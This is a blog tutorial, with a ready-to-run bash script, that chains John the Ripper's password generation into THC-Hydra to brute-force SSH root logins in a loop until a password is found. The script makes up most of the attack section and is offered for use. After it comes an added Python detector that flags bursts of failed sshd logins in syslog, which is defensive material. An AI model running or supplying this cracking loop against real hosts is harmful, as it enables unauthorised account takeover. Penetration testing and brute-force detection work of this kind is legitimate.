1. Introduction
You probably already know THC-Hydra. Hydra is a brute-force password cracker that supports a lot of protocols and services.
The only problem you may run into with Hydra is that it does not digest huge password lists. The reason is that Hydra first loads the whole password file into memory (RAM) before starting the brute-force attack, so you are limited by your memory size.
That is fine with a usual password dictionary, but you may want more: something like the password lists generated by John the Ripper (John provides great ways to generate passwords: digit-, alpha- or special-chars-only modes, "rules" options, "external" filters, etc.).
Our goal is to use the output of John the ripper with Hydra.
The method is trivial but does the job.
    loop
      (1) Generate random passwords with John the Ripper into a file for a few
          seconds (the file grows very quickly). Keep John's session file.
      (2) Run Hydra with the password file.
      (3) If a password is found, exit; if not, continue the session
          created in (1).
    end loop
2. The script
This is the bash script I wrote to perform the task.
- Review the `hydra_*` variables (run `hydra --help` if needed). See `hydra_host`, `hydra_port`, `hydra_module`, … and maybe `hydra_all_params`.
- Review the `john_*` variables. See `john_all_params` and choose your template (cracking mode): `--incremental:All`, `--incremental:Digits`, `--incremental:Alpha`, `--single`, `--rules`, … See the john.conf file for the full list.
Enjoy!
Get hydra-john.sh
```sh
#!/bin/sh
hydra="/usr/local/bin/hydra"
john="/usr/bin/john"

hydra_module="ssh2"
hydra_host="127.0.0.1"
hydra_port="22"
hydra_nb_task="10"
hydra_all_params="-f -s $hydra_port -t $hydra_nb_task -e ns "

john_sessionfile="$1"
john_all_params="--incremental:Alpha --stdout"
john_time_step=20 # time (seconds) to run john

tmp_passwd="/tmp/pwd1234.tmp"
hydra_logfile="/tmp/hydralog"

if [ "$1" = "" ];then
  echo "Usage: $0 <john session file>"
  exit 0
fi

#for lfile in `ls $loginfiles*`;do
while [ 1 ];do
  # generate some passwords with john the ripper
  echo; echo "- Start (re)generating passwords with John"
  if [ -e "$john_sessionfile.rec" ];then
    # if the session exists, restore it
    $john --restore=$john_sessionfile > $tmp_passwd &
  else
    # if the session does not exist yet, create it
    $john $john_all_params --session=$john_sessionfile > $tmp_passwd &
  fi
  # wait $john_time_step seconds, then kill john and start hydra on the file
  echo "- Wait ..."
  sleep $john_time_step
  echo "- Kill john"
  killall john 2>/dev/null 1>/dev/null
  sleep 1

  # start hydra
  echo; echo "- Start hydra"; echo
  rm -f $hydra_logfile
  echo "$hydra -l root -P $tmp_passwd $hydra_all_params $hydra_host $hydra_module | tee -a $hydra_logfile"
  $hydra -l root -P $tmp_passwd $hydra_all_params $hydra_host $hydra_module | tee -a $hydra_logfile

  # if a valid pair has been found, stop the loop
  if [ "`grep $hydra_module $hydra_logfile | grep -v DATA`" != "" ];then
    echo; echo "FOUND !!"
    grep $hydra_module $hydra_logfile | grep -v DATA
    exit 0
  fi
done
```
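The procedure above leaves a telltale pattern on the target: bursts of parallel SSH login failures for the same account (hydra_nb_task=10 parallel tasks, restarted every john_time_step seconds). The following sliding-window detector over sshd syslog lines is an added example, not code from the original post; the log lines are constructed, and the threshold (5 failures) and window (60 s) are assumed values.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample (not taken from the post): one source firing a burst of
# failed "root" logins, one unrelated failure, and one normal successful login.
SAMPLE_LOG = [
    "Jan 10 12:00:00 gw sshd[1990]: Accepted publickey for alice from 198.51.100.7 port 50111 ssh2",
    "Jan 10 12:00:03 gw sshd[1995]: Failed password for invalid user admin from 203.0.113.5 port 40022 ssh2",
] + [
    f"Jan 10 12:00:{s:02d} gw sshd[{2000 + s}]: Failed password for root from 192.0.2.10 port {51000 + s} ssh2"
    for s in range(1, 8)
]

# OpenSSH "Failed password" lines in traditional syslog format (no year in the timestamp).
LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: Failed password for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<src>\S+) port \d+"
)

def parse_failures(lines):
    """Yield (timestamp, user, source_ip) for each failed-password line, in input order."""
    for line in lines:
        m = LINE_RE.match(line)
        if m:
            # strptime defaults the missing year to 1900; fine for relative comparisons
            ts = datetime.strptime(m["ts"].replace("  ", " "), "%b %d %H:%M:%S")
            yield ts, m["user"], m["src"]

def detect_bursts(lines, threshold=5, window_s=60):
    """Return {src_ip: {"window_count": n, "users": [...]}} for each source that
    reached `threshold` failures inside a sliding `window_s`-second window.
    Each source's lines are assumed to arrive in chronological order, as sshd writes them."""
    recent = defaultdict(deque)  # src -> (ts, user) pairs still inside the window
    alerts = {}
    for ts, user, src in parse_failures(lines):
        q = recent[src]
        q.append((ts, user))
        while (ts - q[0][0]).total_seconds() > window_s:
            q.popleft()
        if len(q) >= threshold:
            alerts[src] = {"window_count": len(q), "users": sorted({u for _, u in q})}
    return alerts

if __name__ == "__main__":
    for src, info in detect_bursts(SAMPLE_LOG).items():
        print(f"ALERT {src}: {info['window_count']} failed logins in window, users={info['users']}")
```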
© 2010 – 2011, foip. All rights reserved.